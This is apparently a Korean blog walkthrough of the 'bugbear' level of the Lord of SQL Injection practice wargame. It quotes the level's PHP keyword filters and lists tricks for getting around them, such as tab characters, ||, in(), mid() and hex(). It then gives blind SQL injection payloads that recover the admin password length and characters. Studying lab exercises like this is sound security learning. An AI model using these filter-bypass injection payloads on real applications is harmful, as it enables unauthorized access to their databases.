[LOS] Bugbear 풀이(13)

13번째 문제인 " bugbear "입니다.  bugbear의 경우 검증하는 키워드가 많이 늘어나 우회 구문을 사용해서 쿼리문을 작성해야 됩니다.

 

if(preg_match('/prob|_|\.|\(\)/i', $_GET[no])) exit("No Hack ~_~"); 
if(preg_match('/\'/i', $_GET[pw])) exit("HeHe"); 
if(preg_match('/\'|substr|ascii|=|or|and| |like|0x/i', $_GET[no])) exit("HeHe"); 

새롭게 검증하는 필터링은 or 구문 대신 사용되었던 " like " 를 검증하고 hex 코드 실행 방지를 위해 "0x"까지 검증하고 있습니다. 

 

또한 " ascii " 코드사용하는것까지 막고 있기에 " ord " 를 사용하려고 했으나 실패했습니다.

이유는 preg_match 함수에 포함된 " or " 문자를 검증하기 때문에 " org "를 사용해 ascii 코드를 가져오지 않고 "hex"를 통해서 가져와야 된다는 걸 알았습니다.

보통 이런 상황에서는 사용하고자하는 키워드를 하나씩 우회 구문으로 변경해가면서 응답 값을 비교해보면서 하면 어느 정도 쿼리문이 완성됩니다.

 

필터링 구문 우회

공백 --> %09(TAB)
or  --> ||(파이프 연산자)
= (like 검증하기에 다른 거 사용) --> in()
and --> &&(%26%26)
substr --> mid()
ascii(org 가 걸리기에 다른 거사용) --> hex()

 

$query = "select pw from prob_bugbear where id='admin' and pw='{$_GET [pw]}'"; 
if(($result ['pw']) && ($result['pw'] == $_GET ['pw'])) solve("bugbear");

해당 문제를 해결하기 위해선 " admin " 계정으로 접근이 가능해야 하며 접근 하기 위한 조건은 입력한 패스워드와 db 내에 저장되어 있는 패스워드 값을 비교해서 일치해야 되기 때문에 BSQLI 기법을 사용해서 정확한 패스워드 값을 유추해야 됩니다.

 

패스워드 길이 유추

1%09||%09id%09in%09("admin")%09%26%26%09length(pw)%09in%09(5) -->FALSE
1%09||%09id%09in%09("admin")%09%26%26%09length(pw)%09in%09(8) -->TRUE

 

공백을 검증하고 있어서 인코딩으로 채우느라 조금 복잡해 보이지만 키워드 하나씩 허용되는 문자열로 변경해 주다 보면 성공적으로 " Hello admin " 구문이 나타납니다. 

 

성공한 구문에 hex(mid() 를 사용해서 하나씩 ascii 값을 대입해보면 8자리 문자 열중 사용된 값을 하나씩 유추해볼 수 있습니다.

32 ~ 47 : 특수문자 (space, !, ", #, $, %, & 등)
58 ~ 64 : 특수문자 (:, ;, <, =, >, ?, @)
123 ~ 126 : 특수문자 ({, |, }, ~)
48 ~ 57 : 숫자 (0 ~ 9)
65 ~ 90 : 영어(대문자) (A ~ Z)
97 ~ 122  : 영어(소문자) (a ~ z)

패스워드 길이 유추

<숫자추출>

1%09||%09id%09in%09("admin")%09%26%26%09hex(mid(pw,1,1))%09in%09(hex(47~57))%23

<소문자 추출>

1%09||%09id%09in%09("admin")%09%26%26%09hex(mid(pw,1,1))%09in%09(hex(97~122))%23

 

도출된 값 복구

53 --> 5
50 --> 2
100 --> d
99 --> c
51 --> 3
57 --> 9
57 --> 9
49 --> 1

 

" 참 "인 경우 나타나는 " Hello admin "을 참고하여 도출된 패스워드를 변환해보면 성공적으로 clear 가 된 것을 확인할 수 있습니다. 

 

이번 문제는 검증하는 키워드가 확연하게 늘어나서 어느 정도 혼돈이 있었지만 차근차근 해결해보니 해답이 보이기 시작했네요.